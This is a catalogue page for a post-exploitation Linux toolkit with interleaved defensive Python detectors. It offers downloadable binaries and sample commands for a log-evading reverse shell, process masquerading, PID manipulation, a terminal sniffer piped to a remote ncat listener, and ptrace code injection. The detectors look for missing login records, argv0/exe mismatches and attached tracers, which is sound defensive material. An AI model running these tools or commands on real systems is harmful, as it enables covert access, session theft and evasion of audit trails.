What is PELT?
PELT is the Post Exploitation Linux Toolkit. It is intended as a collection of Linux user space tools designed to assist pentesters during the post-exploitation phases of their engagement. The tools appear here as pre-built binaries for easy access in the field.
These tools are each projects of mine with their own GitHub pages. Please refer to these project pages for full descriptions as well as source code.
revsh is a reverse shell. It was designed to meet the needs of pentesters facing long engagements. The features include:
- Full terminal support.
- Unicode support.
- Circumvention of the login record. (utmp / wtmp)
- rc file support for launching recurring / customized commands upon login.
- OpenSSL encryption with key based authentication baked into the binary.
- Anonymous Diffie-Hellman encryption upon request.
- Ephemeral Diffie-Hellman encryption as default.
- Cert pinning for protection against sinkholes and mitm counter-intrusion.
- Connection timeout for remote process self-termination.
- Randomized retry timers for non-predictable auto-reconnection.
- Netcat style non-interactive data brokering for file transfer.
Project page: https://github.com/emptymonkey/revsh
Pre-built binaries: x86_64-Linux, i686-Linux, amd64-FreeBSD
Tarball of the keys / certs used with these binaries: keys.tar
Example:
empty@monkey:~$ ./revsh -c
user@target:~$ ./revsh
Note: The pre-built binaries here use the default keys provided. If you are using this anywhere sensitive, you are strongly encouraged to download the source and build your own copy. This will generate unique keys / certs. As always, your mission is only as secure as your key management process.
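The utmp circumvention listed above is also where a defender can look for it. The following is an added example, not revsh's or PELT's code: it lists pseudo-terminals that are the controlling terminal of a running process but have no USER_PROCESS record in /var/run/utmp, which is exactly the gap a login-record-skipping shell leaves behind. It assumes the glibc x86_64 struct utmp layout (384 bytes per record) and USER_PROCESS == 7; the utmp records and the active-pty set used as sample data are constructed for the example.

```python
"""Added example, not part of revsh or PELT: find pseudo-terminals that are in
use by a live process but have no login record in /var/run/utmp.

A shell that allocates a pty but skips the utmp/wtmp write never appears in
`who` or `w`, yet its pty is still the controlling terminal of a running
process. Comparing the two views exposes the gap.

Labelled assumptions: the glibc x86_64 `struct utmp` layout (384 bytes) and
USER_PROCESS == 7, the record type `who` lists. The sample utmp data below is
constructed for the example.
"""
import os
import struct

# struct utmp on x86_64 glibc: ut_type, 2 pad bytes, ut_pid, ut_line[32],
# ut_id[4], ut_user[32], ut_host[256], ut_exit (two shorts), ut_session,
# ut_tv (sec, usec), ut_addr_v6[4], 20 reserved bytes -> 384 bytes per record.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS = 7


def _cstr(raw):
    """Decode a NUL-padded fixed-width C string field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def make_record(ut_type, pid, line, user, host=""):
    """Pack one utmp record (used here only to build constructed sample data)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, 0, 0, 0, 0, 0, 0)


def parse_utmp(data):
    """Return (ut_type, pid, line, user, host) for every whole record in data."""
    records = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append((f[0], f[1], _cstr(f[2]), _cstr(f[4]), _cstr(f[5])))
    return records


def logged_in_lines(records):
    """tty names (e.g. 'pts/3') that utmp says belong to a logged-in user."""
    return {r[2] for r in records if r[0] == USER_PROCESS}


def active_ptys(proc="/proc"):
    """'pts/N' names held as stdin/stdout/stderr by some running process."""
    found = set()
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        for fd in ("0", "1", "2"):
            try:
                target = os.readlink(f"{proc}/{pid}/fd/{fd}")
            except OSError:  # process gone, or not ours to inspect
                continue
            if target.startswith("/dev/pts/"):
                found.add(target[len("/dev/"):])
    return found


def orphan_ptys(records, active):
    """ptys in use by a process but missing from utmp: review these sessions."""
    return set(active) - logged_in_lines(records)


# Constructed sample: two recorded logins; a third pty (pts/5) is in use by a
# process but was never written to utmp.
CONSTRUCTED_UTMP = (make_record(USER_PROCESS, 1200, "pts/0", "alice", "10.0.0.5")
                    + make_record(USER_PROCESS, 1300, "pts/1", "bob"))
CONSTRUCTED_ACTIVE = {"pts/0", "pts/1", "pts/5"}


if __name__ == "__main__":
    try:
        with open("/var/run/utmp", "rb") as fh:
            recs = parse_utmp(fh.read())
        live = active_ptys()
    except OSError:
        recs, live = parse_utmp(CONSTRUCTED_UTMP), CONSTRUCTED_ACTIVE
    for pty in sorted(orphan_ptys(recs, live)):
        print(f"{pty}: in use but not in utmp")
```

Treat the output as a triage list rather than a verdict: terminal emulators, tmux/screen windows and some sudo-spawned shells also run on ptys without writing a USER_PROCESS entry, so each hit should be correlated with the process that owns the pty. Reading other users' /proc/PID/fd links requires root, so run the scan with privileges for full coverage.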
mimic is a tool that allows a user to run a program, but have it show up in the process table as something different. The name in the process listing can be any string. mimic does not require root privileges.
Project page: https://github.com/emptymonkey/mimic
Pre-built binaries: x86_64-Linux
Example:
empty@monkey:~$ ./mimic -e "/bin/bash" -m "/sbin/getty 38400 tty0"
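mimic works because /proc/PID/cmdline (and /proc/PID/comm) are under the process's own control; /proc/PID/exe, by contrast, is a kernel-maintained symlink to the file that was actually executed and cannot be rewritten from user space. The following is an added example, not mimic's or PELT's code: it compares the two and flags processes whose argv[0] names a different program than their exe link. The allowance for versioned interpreter names (argv[0] "python3" for exe "python3.11") is a heuristic of this example, not something the page states.

```python
"""Added example, not part of mimic or PELT: flag processes whose advertised
command line names a different program than the binary the kernel executed.

/proc/PID/cmdline and /proc/PID/comm are writable by the process itself;
/proc/PID/exe is maintained by the kernel, so a mismatch between argv[0] and
exe is a cheap, high-value check.

Labelled assumption: the interpreter allowance below (argv[0] 'python3' for
exe 'python3.11') is a heuristic of this example.
"""
import os


def classify(cmdline, exe):
    """Compare raw /proc/PID/cmdline text with the readlink() of /proc/PID/exe.

    Returns one of: 'empty-cmdline', 'deleted-binary', 'argv0-mismatch', 'ok'.
    """
    if not cmdline:
        return "empty-cmdline"  # kernel threads and zombies have no argv
    if exe.endswith(" (deleted)"):
        return "deleted-binary"  # binary unlinked after exec: also worth a look
    # cmdline fields are NUL separated; a tool may also place one string with
    # spaces into argv[0], so take the first whitespace-delimited token too.
    argv0 = os.path.basename(cmdline.split("\0", 1)[0].split(" ", 1)[0])
    exe_name = os.path.basename(exe)
    if argv0 == exe_name:
        return "ok"
    # Versioned interpreters: 'python3' vs 'python3.11', 'perl' vs 'perl5.36'.
    if argv0 and exe_name.startswith(argv0):
        return "ok"
    return "argv0-mismatch"


def scan_procs(proc="/proc"):
    """Return [(pid, argv_text, exe, verdict)] for every process not 'ok'.

    Reading /proc/PID/exe of another user's process needs root, so run this
    with privileges for full coverage; unreadable entries are skipped.
    """
    hits = []
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(f"{proc}/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().decode("utf-8", "replace")
            exe = os.readlink(f"{proc}/{pid}/exe")
        except OSError:
            continue
        verdict = classify(cmdline, exe)
        if verdict not in ("ok", "empty-cmdline"):
            hits.append((int(pid), cmdline.replace("\0", " ").strip(), exe, verdict))
    return hits


if __name__ == "__main__":
    for pid, shown, real, verdict in sorted(scan_procs()):
        print(f"{pid:>7}  {verdict:<15} shown={shown!r}  exe={real}")
```

Expect some benign hits: symlinked multi-call binaries (sh resolving to dash, busybox applets) and programs that rewrite their own argv[0] (some daemons do this for status display) will show as argv0-mismatch, so the list is a starting point for review, not a blocklist.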
set_target_pid is a simple program that resets the Process ID (PID) numbers being issued by the system as close as possible to a target. This program is part of the mimic project. This program does not require root privileges.
Project page: https://github.com/emptymonkey/mimic
Pre-built binaries: x86_64-Linux
Example:
empty@monkey:~$ ./set_target_pid 1
Note: The target PID is only a target. set_target_pid will try to get as close as possible, but that PID may simply not be available. The PIDs smaller than 300 appear to be reserved for kernel threads. If you request a PID of '1', then look for the result around '300'. Finally, after you set the PIDs being issued to your target and you have launched your payload, don't forget to reset the PIDs again to where they were before.
shelljack is a terminal sniffer. (This is similar to a keystroke logger, but it gathers all input and output.) shelljack does not require root privileges (except on Ubuntu systems).
Project page: https://github.com/emptymonkey/shelljack
Pre-built binaries: x86_64-Linux
Example:
empty@monkey:~$ ncat -l 192.168.1.42 9999
user@target:~$ ./shelljack 192.168.1.42:9999 $$
Note: shelljack uses ptrace() to attach to processes. Because Ubuntu is patched specifically against this type of attack, shelljack won't work on Ubuntu systems unless it is run as root.
sigsleeper injects malicious code into a process that can be triggered by sending that process a signal. This type of attack is best described as a "malicious signal handler injection with ptrace" attack. Because the injected code sits quietly until it receives its signal, at which point it launches its payload, I refer to this as "sleeper code". sigsleeper does not require root privileges (except on Ubuntu systems).
Project page: https://github.com/emptymonkey/sigsleeper
Pre-built binaries: x86_64-Linux
Example:
empty@monkey:~$ sigsleeper -f -e '/bin/echo Hello world!' $$
empty@monkey:~$ kill -USR1 $$
empty@monkey:~$ Hello world!
Note: sigsleeper uses ptrace() to attach to processes. Because Ubuntu is patched specifically against this type of attack, sigsleeper won't work on Ubuntu systems unless it is run as root.
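The "Ubuntu patch" in the shelljack and sigsleeper notes above is the Yama LSM's kernel.yama.ptrace_scope sysctl, which Ubuntu sets to 1 by default; at that level an unprivileged process may only attach to its own descendants unless the target opts in with PR_SET_PTRACER, which is why both tools need root there. The following is an added example, not shelljack's, sigsleeper's or PELT's code, serving both notes: it reports the host's ptrace_scope setting and lists processes that currently have a tracer attached (a non-zero TracerPid in /proc/PID/status). The /proc/PID/status text used as sample data is constructed for the example.

```python
"""Added example, not part of shelljack, sigsleeper or PELT: report how far
this host restricts ptrace() attachment, and list processes that currently
have a tracer attached.

The sysctl values follow Documentation/admin-guide/LSM/Yama.rst. While a tracer
is attached, the target's /proc/PID/status shows a non-zero TracerPid, which
is the second check below. The sample status text is constructed.
"""
import os

SCOPE_PATH = "/proc/sys/kernel/yama/ptrace_scope"

# Meaning of each ptrace_scope value.
SCOPE_MEANING = {
    0: "classic: any process may attach to another process of the same UID",
    1: "restricted: only ancestors may attach, unless the target calls PR_SET_PTRACER",
    2: "admin-only: attaching requires CAP_SYS_PTRACE",
    3: "no attach: ptrace attach is disabled entirely (cannot be lowered without reboot)",
}


def interpret_scope(raw):
    """Turn the sysctl's text ('1\\n') into (level, meaning, same_uid_attach_allowed)."""
    level = int(raw.strip())
    if level not in SCOPE_MEANING:
        raise ValueError(f"unexpected ptrace_scope value {level!r}")
    return level, SCOPE_MEANING[level], level == 0


def read_scope(path=SCOPE_PATH):
    """Return the live setting as interpret_scope() does, or None when Yama is absent."""
    try:
        with open(path) as fh:
            return interpret_scope(fh.read())
    except FileNotFoundError:
        return None


def parse_tracer_pid(status_text):
    """Extract TracerPid from /proc/PID/status text; 0 means nobody is attached."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1].strip())
    raise ValueError("no TracerPid line in status text")


def traced_processes(proc="/proc"):
    """[(pid, name, tracer_pid)] for every readable process with a tracer attached."""
    hits = []
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(f"{proc}/{pid}/status") as fh:
                text = fh.read()
        except OSError:
            continue
        tracer = parse_tracer_pid(text)
        if tracer:
            name = next((ln.split(":", 1)[1].strip() for ln in text.splitlines()
                         if ln.startswith("Name:")), "?")
            hits.append((int(pid), name, tracer))
    return hits


# Constructed sample of the relevant part of /proc/PID/status for a shell that
# has a tracer (PID 4242) attached.
CONSTRUCTED_STATUS = ("Name:\tbash\nUmask:\t0022\nState:\tt (tracing stop)\n"
                      "Pid:\t1337\nPPid:\t1\nTracerPid:\t4242\n")


if __name__ == "__main__":
    scope = read_scope()
    if scope is None:
        print("Yama not present: same-UID ptrace attach is allowed (as with scope 0)")
    else:
        level, meaning, exposed = scope
        print(f"ptrace_scope={level}: {meaning}")
        if exposed:
            print("consider: sysctl -w kernel.yama.ptrace_scope=1 (or 2 on servers)")
    for pid, name, tracer in traced_processes():
        print(f"pid {pid} ({name}) is being traced by pid {tracer}")
```

Two caveats when reading the results: raising ptrace_scope only limits unprivileged attachment (the notes above already say both tools work as root), and a tracer that detaches after doing its work leaves TracerPid at 0, so the second check only sees attachments that persist, such as a sniffer that stays on the process. Debuggers and profilers legitimately show up as tracers too.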
pretend is a very simple program that changes your UID / GIDs. pretend does require root privileges. It is useful for programmatically changing your UID on the fly without requiring that the UID map to a valid account on the host. There is a class of attacks for which this tool is very nice to have available.
Project page: https://github.com/emptymonkey/pretend
Pre-built binaries: x86_64
Example:
empty@monkey:~$ sudo pretend 5:26:103:110:50 id
uid=5(games) gid=26(tape) groups=60(games),50(staff),103(ssh),110(kvm)
I write and release these tools with the intention of educating the larger IT community and empowering legitimate pentesters. If I can write these tools in my spare time, then rest assured that the dedicated malicious actors have already developed versions of their own.